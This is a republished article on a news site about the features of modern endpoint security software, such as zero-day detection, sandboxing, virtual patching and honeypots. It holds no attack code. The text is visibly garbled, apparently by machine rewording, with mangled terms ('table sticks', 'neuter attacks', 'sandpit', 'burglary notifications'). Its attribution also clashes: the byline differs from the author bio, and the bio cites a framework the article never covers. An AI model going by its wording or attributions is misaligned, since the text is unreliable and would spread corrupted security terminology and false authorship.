• About Us
  • Contact Us
Wednesday, January 27, 2021
Chyper News
No Result
View All Result
  • News

    Trending Tags

    • Commentary
    • Featured
    • Event
    • Editorial
  • Politics
  • National
  • Business
  • World
  • Opinion
  • Tech
  • Science
  • Lifestyle
  • Entertainment
  • Health
  • Travel
  • News

    Trending Tags

    • Commentary
    • Featured
    • Event
    • Editorial
  • Politics
  • National
  • Business
  • World
  • Opinion
  • Tech
  • Science
  • Lifestyle
  • Entertainment
  • Health
  • Travel
No Result
View All Result
Morning News
No Result
View All Result
Home Cyber Security

Endpoint security: it's a whole new world

Gary Martin by Gary Martin
May 23, 2019
in Cyber Security
0
0
SHARES
40
VIEWS
Share on FacebookShare on Twitter

Once upon a time, endpoint security was just a hall monitor. It looked for known bad files identified with a simple signature and sent you a notification when the file was blocked. To be safe, it would scan every machine every day, an intrusive activity that slowed machines down and accelerated the heartbeats of affected users and unhappy analysts on help desks.

Those days are over, my friend. Those days are over. Endpoint security, like all technology, is now order of magnitude more sophisticated than when it was born. Functions that once looked innovative and leaning forward are now "table sticks" – essential for consideration, almost adopted. Here are some of the basic and not-so-basic functions of modern endpoint security software.

At the top of the list are three sine non-capacities:

  1. Zero day detection (previously unknown malware)
  2. Detection and prevention of memory-based attacks (a.k.a. "neuter" attacks) that are executed on an infected machine but never place a file on the victim's system
  3. Ability to track processes running at an endpoint and identify "bad", or at least unusual, behaviors

If malware somehow slips through the breaks, good endpoint software can and will search all machines in an organization – without any interruption for end users – to minimize the spread of an infection. Of course, it should generate alerts in response to such events, but it should minimize false positives and provide severity levels and / or comprehensible descriptions of the abusive malware. Security staff is notoriously overloaded. They cannot waste time tracking down false alarms, and they need to know how to prioritize real burglary notifications.

To quote John Donne: "No one is an island". The same applies to endpoint protection, in fact for every type of cyber security tool. Endpoint protection systems must feed their findings with other systems such as SIEM & threat information sharing systems and must record data from multiple sources. Automatically quarantining infected machines is also essential, as is the ability to cause malware to explode on virtual machines or even on special hardware, all without hitting the malware it uses in a "sandbox". Endpoint security systems must also protect themselves by detecting and reporting attempts to remove them.

Finally, endpoint security systems can assist the user or system administrator by guiding them through a solution and thereby offering suggestions and practical tips.

So far the "table stakes" – which are already quite advanced. What are some advanced (provisional) features of a modern endpoint security system? There are many, only limited by the ingenuity and expertise of the developers.

Automated vulnerability shielding, also known as virtual patching, is crucial, along with the ability to send suspicious malware to a special sandbox machine to observe its behavior. In the endless cat-and-mouse game between defenders and attackers, attackers have learned to write malware that detects when it is in a sandpit, does not explode and is useless with an innocent look on its face. Endpoint vendors, in turn, can see when malware knows it is in a detonation room and can still explode. This game can continue ad infinitum, so routing to a physical, special detonation sandbox is clearly a useful feature. At the other end of the spectrum, however, there is the option of creating a miniature VM at the endpoint itself and detonating the malware directly but harmlessly.

Many organizations use misleading technology, also known as "honeypots" or "honeynets." Advanced endpoint software can route malware to a counter network or system, delaying an attack and allowing defenders to analyze an attack without fear of a violation of production data or machines. In fact, a good system can help the hardened security team with response and recovery recommendations and help identify the attackers.

Security companies innovate every day, so there are many opportunities that I have not mentioned here, including projects that are still under development or have not yet been created. Endpoint protection: it is a whole new world.


About the author: As Chief Cyber ​​Security Technologist for DLT, Don Maclean formulates and implements cyber security portfolio strategy, speaks and writes about security issues and socializes the cyber security portfolio of his company. Don has nearly 30 years of experience with US federal agencies.

Prior to joining DLT in 2015, Don managed security programs for numerous US federal customers, including DOJ, DOL, FAA, FBI and the Treasury department. This experience enabled him to work closely with the NIST Risk Management Framework described in this article and to understand its strengths and weaknesses. In addition to his CISSP, PMP, CEH and CCSK certificates, Don & # 39; s holds a B.A. in music from Oberlin, an M.S. in Information Security from Brandeis Rabb School, and is almost completing his second bachelor's degree in mathematics.

Publisher's note: The opinions expressed in this article about the guest authors are solely those of the author and do not necessarily reflect those of Tripwire, Inc.

Next Post
Barracuda Sentinel protects e-mail where others fail

Barracuda Sentinel protects e-mail where others fail

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

About

Chypernews is an individual news publication which covers the news around market research, health, politics and technology in general. Get in touch with us on contact@chypernews.com to know more.

Categories

  • Business
  • Computer Security
  • Cyber Security
  • Malware
  • Market News
  • Uncategorized
  • Vulnerability

Recent Posts

  • Pharmaceutical Asset Management Market Comprehensive Report, 5-Year Forecast, Competitor Analysis
  • Comprehensive Report On The Indium Gallium Zinc Oxide (IGZO) Market – Sharp, Samsung ElectronicsProfits Forecast, Market Share Analysis
  • 5 Year Warehouse Management System (WMS) Market Forecast With Focus on Performance of AFS Technologies, AGI Worldwide
  • Flatwares Market Research Report 2019-2024 – Top Key Players BergHOFF, Cambridge Silversmith, Ginkgo
No Result
View All Result
  • Homepages
    • Home Page 1
    • Home Page 2
  • News
  • Politics
  • National
  • Business
  • World
  • Entertainment
  • Fashion
  • Food
  • Health
  • Lifestyle
  • Opinion
  • Science
  • Tech
  • Travel

© 2019 Chypernews.

Login to your account below

Forgotten Password?

Fill the forms bellow to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In